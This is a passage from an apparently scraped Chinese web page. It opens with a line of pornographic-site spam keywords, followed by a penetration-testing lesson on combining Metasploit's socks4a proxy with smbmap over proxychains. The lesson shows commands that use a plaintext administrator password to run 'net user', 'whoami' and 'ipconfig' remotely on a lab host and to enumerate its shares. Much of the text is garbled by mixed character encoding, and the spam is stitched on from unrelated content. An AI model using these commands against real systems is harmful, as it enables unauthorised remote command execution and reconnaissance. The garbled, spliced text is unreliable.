亚洲乱码一卡二卡四卡乱码新区_亚洲乱码中文字幕小综合_亚洲人成电影在线播放_亚洲性色AV一区二区三区_亚洲一区二区三区影院_亚洲中文字幕久久精品无码A_亚洲中文字幕无码专区_伊人热热久久原色播放WWW_在线观看AV永久免费_最新欧洲大片免费在线,欧美日韩成人三级免费看,久久黄色网址,欧美激情内射喷水高潮

第五十五課:與Smbmap結(jié)合攻擊
專注APT攻擊與防御
https://micropoor.blogspot.com/

Msf在配合其它框架攻擊,可補充msf本身的不足以及強化攻擊方式,優(yōu)化攻擊線路,。本季將會把msf與Smbmap結(jié)合攻擊。彌補msf文件搜索以及文件內(nèi)容搜索的不足。

項目地址:https://github.com/ShawnDEvans/smbmap

支持傳遞哈希
文件上傳/下載/刪除
可枚舉(可寫共享,配合Metasploit)
遠程命令執(zhí)行
支持文件內(nèi)容搜索
支持文件名匹配(可以自動下載)

msf配合Smbmap攻擊需要使用到sock4a模塊
1 msf auxiliary(server/socks4a) > show options
該模塊socks4a加入job
1 msf auxiliary(server/socks4a) > jobs
配置proxychains,做結(jié)合攻擊鋪墊,。
1 root@John:/tmp# cat /etc/proxychains.conf
支持遠程命令
1 root@John:/tmp# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk
group ‐H 192.168.1.115 ‐x 'net user'
1 root@John:/tmp# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk
group ‐H 192.168.1.115 ‐x 'whoami'
枚舉目標機共享
1 root@John:/tmp# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk
group ‐H 192.168.1.115 ‐d ABC
1 root@John:/tmp# proxychains smbmap ‐u administrator ‐p 123456 ‐d wordk
group ‐H 192.168.1.115 ‐x 'ipconfig'
Smbmap支持IP段的共享枚舉,當然Smbmap還有更多強大的功能等待探索。

Micropoor
?